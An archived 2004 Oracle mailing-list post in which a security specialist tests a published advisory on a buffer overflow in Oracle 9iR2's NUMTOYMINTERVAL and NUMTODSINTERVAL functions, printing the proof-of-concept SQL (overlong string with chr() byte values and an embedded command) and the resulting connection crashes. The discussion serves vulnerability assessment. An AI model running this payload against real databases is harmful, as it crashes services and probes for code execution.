Oracle Database 9ir2 Interval Conversion Buffer Overflow

Links

Frequent Oracle Errors

•	TNS:could not resolve the connect identifier specified
•	Backtrace message unwound by exceptions
•	invalid identifier
•	PL/SQL compilation error
•	internal error
•	missing expression
•	table or view does not exist
•	end-of-file on communication channel
•	TNS:listener unknown in connect descriptor
•	insufficient privileges
•	PL/SQL: numeric or value error string
•	TNS:protocol adapter error
•	ORACLE not available
•	target host or object does not exist
•	invalid number
•	unable to allocate string bytes of shared memory
•	resource busy and acquire with NOWAIT specified
•	error occurred at recursive SQL level string
•	ORACLE initialization or shutdown in progress
•	archiver error. Connect internal only, until freed
•	snapshot too old
•	unable to extend temp segment by string in tablespace
•	Credential retrieval failed
•	missing or invalid option
•	invalid username/password; logon denied
•	unable to create INITIAL extent for segment
•	out of process memory when trying to allocate string bytes
•	shared memory realm does not exist
•	cannot insert NULL
•	TNS:unable to connect to destination
•	remote database not found'>ora-02019
•	exception encountered: core dump
•	inconsistent datatypes
•	no data found
•	TNS:operation timed out
•	PL/SQL: could not find program
•	existing state of packages has been discarded
•	maximum number of processes exceeded
•	error signaled in parallel query server
•	ORACLE instance terminated. Disconnection forced
•	TNS:packet writer failure
•	see ORA-12699
•	missing right parenthesis
•	name is already used by an existing object
•	cannot identify/lock data file
•	invalid file operation
•	quoted string not properly terminated

Oracle Database 9ir2 Interval Conversion Buffer Overflow

Oracle Database 9ir2 Interval Conversion Buffer Overflow

2004-02-26 - By Pete Finnigan

Reply: 1 2 3 4 5 6 7 8 9 10

Hi Jared,

I heard about this issue in early Feb. This guy Cesar Cerrudo posted a
message to vulnwatch about these two vulnerabilities and also said he
had a lot more. I saw a post on Bugtraq yesterday where someone was
asking for the patch info. It is not clear if an Oracle fix matches this
bug or not and which patch applies. There is no advisory.

Here is the header info from vulnwatch from his post. I have the full
email sent to vulnwatch which is similar to Jared 's version on
securiteam but is longer (no extra technical details mostly rants)

<quote >
From: Cesar [mailto:cesarc56@(protected)]
Sent: Thu 2004-02-05 3:15 PM
To: vulnwatch@(protected)
Cc:
Subject: [VulnWatch] Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow
Security Advisory

Name: Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow.
System Affected : Oracle Database 9ir2, previous
versions could be affected too.
Severity : High
Remote exploitable : Yes
Author: Cesar Cerrudo.
Date: 02/05/04
Advisory Number: CC020401
</quote >

Anyway I have run the following test based on what he said in his
advisory:

SQL > edit
Wrote file afiedt.buf

1 SELECT NUMTOYMINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK
LMNOPQR '
2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|
3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|
4* ARE YOU SURE? >c:\Unbreakable.txt ') FROM DUAL
SQL > /
ARE YOU SURE? >c:\Unbreakable.txt ') FROM DUAL
*
ERROR at line 4:
ORA-03113 (See ORA-03113.ora-code.com): end-of-file on communication channel

SQL > select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114 (See ORA-03114.ora-code.com): not connected to ORACLE

SQL >
SQL > connect system/manager@(protected)
Connected.
SQL > edit
Wrote file afiedt.buf

1 SELECT NUMTODSINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJK
LMNOPQR '
2 || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)|
|chr(18)||chr(80)||chr(255)|
3 ||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)|
|chr(33)||chr(148)||chr(01)|
4* ARE YOU SURE? >c:\Unbreakable.txt ') FROM DUAL
SQL > /
SELECT NUMTODSINTERVAL(1, 'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOP
QR '
*
ERROR at line 1:
ORA-03113 (See ORA-03113.ora-code.com): end-of-file on communication channel

SQL > select sysdate from dual;
select sysdate from dual
*
ERROR at line 1:
ORA-03114 (See ORA-03114.ora-code.com): not connected to ORACLE

SQL >

So yes both of these vulnerabilities will terminate the Oracle
connection so its possible it could be exploited remotely. The file >
c:\Unbreakable.txt is not created though. I have not tried under a
debugger to see if anything can be done with the 3113 error in terms of
exploiting the stack. If this is a true buffer overflow exploit then he
would need to pass some sort of shell code and manipulate the stack to
run it. Maybe his chr(??) are some sort of shell code for it to be a
buffer overflow and capture the machine. On the surface it doesn 't seem
to work though.

SQL*net trace didn 't tell me much and also an Oracle core is created in
the cdump directory with the are you sure text on the top of the stack.
I ran this on XP 9ir2 personal edition.

Kind regards

Pete
--
Pete Finnigan
email:pete@(protected)
Web site: http://www.petefinnigan.com - Oracle security audit specialists
Book:Oracle security step-by-step Guide - see http://store.sans.org for details.

-- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ------
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ------
To unsubscribe send email to: oracle-l-request@(protected)
put 'unsubscribe ' in the subject line.
--
Archives are at http://www.freelists.org/archives/oracle-l/
FAQ is at http://www.freelists.org/help/fom-serve/cache/1.html
-- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- --